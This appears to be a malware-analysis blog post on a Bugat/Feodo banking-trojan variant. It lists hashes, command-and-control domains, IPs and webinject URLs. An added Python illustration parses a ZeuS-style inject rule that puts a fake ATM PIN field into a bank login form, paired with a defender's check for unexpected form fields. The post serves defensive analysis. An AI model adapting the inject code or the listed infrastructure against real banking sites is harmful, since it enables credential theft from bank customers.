MD5: D1455B0C28A145C5D207F276F945ABCA

Unlike the other Bugat payloads we've documented here, which used a domain generation algorithm to locate their command and control server, this variant was hardcoded to connect to four domains for command and control instructions:

scanforsecurytyholes.ru
testnosecurity.ru
securytycheckme.ru
krjjfgzzzooooem.ru

The scanforsecurytyholes.ru and securytycheckme.ru domains are currently offline; the other two resolve to 91.201.4.142. After this variant connected to the first available command and control server, in this case testnosecurity.ru/mev/in, it downloaded a configuration file that included a target list of over 400 websites, the vast majority of them financial institutions. If you'd like a copy of the target list, hit us up at spamalysis@gmail.com.

The downloaded configuration file also revealed the domains hosting the web injects. Bugat, like other banking malware, uses web injects to dynamically man-in-the-middle a victim's online banking session: when the victim logs into their bank's website, the injected HTML and script take over the page inside the browser and steal the victim's banking information in real time. The webinjects used by this Bugat variant were pulled from http://lavonoplanet.ru/mev/in/cp.php. The domain lavonoplanet.ru resolved to 91.201.4.142.
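As an added illustration of what a web inject does, not code or configuration from the original post, the Python below parses a small inject rule in the ZeuS-style set_url / data_before / data_inject / data_after syntax, applies it to a constructed login form, and then shows the defender's check: comparing the form fields the browser renders against the fields the server actually sent. The rule, the URL mask and the form are all constructed for this example; the page does not show the format of the inject file Bugat pulled from cp.php.

```python
import re
from fnmatch import fnmatchcase

# Constructed inject rule in the ZeuS-style syntax (the page does not show
# Bugat's own format). URL mask, flags and HTML are made up for this example.
WEBINJECT_CONFIG = """set_url https://bank.example/login* GP
data_before
<input type="password" name="password"*>
data_end
data_inject
<br>ATM PIN: <input type="text" name="atmpin">
data_end
data_after

data_end
"""

# Constructed login form as the bank's server sends it.
SERVED_PAGE = """<form action="/login" method="post">
User: <input type="text" name="user">
Pass: <input type="password" name="password" maxlength="20">
<input type="submit" value="Sign in">
</form>"""

SECTIONS = ("data_before", "data_inject", "data_after")
FORM_FIELD = re.compile(r'<input[^>]+name=["\']([^"\']+)["\']', re.I)


def parse_webinjects(text):
    """Turn the rule file into a list of dicts, one per set_url block."""
    rules, current, section = [], None, None
    for line in text.splitlines():
        if line.startswith("set_url "):
            _, url_mask, flags = line.split(" ", 2)
            current = {"url": url_mask, "flags": flags, **{s: "" for s in SECTIONS}}
            rules.append(current)
        elif line in SECTIONS:
            section = line
        elif line == "data_end":
            section = None
        elif section and current is not None:
            current[section] += line + "\n"
    for rule in rules:
        for s in SECTIONS:
            rule[s] = rule[s].rstrip("\n")
    return rules


def _mask_to_regex(mask):
    # '*' is the only wildcard inside data_* blocks; everything else is literal.
    return ".*?".join(re.escape(part) for part in mask.split("*"))


def apply_webinjects(url, html, rules):
    """Insert data_inject after the first data_before match on a page whose URL
    matches the rule; if data_after is given it must follow the match point."""
    for rule in rules:
        if not fnmatchcase(url, rule["url"]):
            continue
        match = re.search(_mask_to_regex(rule["data_before"]), html, re.S)
        if not match:
            continue
        if rule["data_after"] and not re.match(_mask_to_regex(rule["data_after"]),
                                               html[match.end():], re.S):
            continue
        html = html[:match.end()] + rule["data_inject"] + html[match.end():]
    return html


def unexpected_fields(served_html, rendered_html):
    """Defender's check: form fields in the browser DOM that the server never sent."""
    served = set(FORM_FIELD.findall(served_html))
    return [name for name in FORM_FIELD.findall(rendered_html) if name not in served]
```

The inject exists only in the victim's DOM: the bank's server never sees the extra field in the page it served, only the value that comes back in the POST, which is why the server-side comparison in unexpected_fields needs the rendered page from the client to work with.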

In addition to providing a configuration file, the command and control server at testnosecurity.ru also pushed a Bugat update on its victims. This updated Bugat payload had the following properties:

Size: 75271
MD5: 0386F4D83DD84D2F60352E00D3F504A6

This updated variant was configured to connect to the following command and control servers:

securytycheckme.ru
sexnotincity.ru

The domain securytycheckme.ru was offline, but sexnotincity.ru resolved to 91.201.4.143. It seems these guys like to host their domains in the same neighborhood. Mental note: stay out of this /24.

The updated Bugat variant pulled its webinjects from the following domains:

http://gloogle.in/mev/in/cp.php
https://meredianstatserv.com/aqweb/in.php

We apologize for not reporting on this one sooner but unfortunately our real lives got in the way this week.

* note, what we call Bugat others call Feodo or Cridex.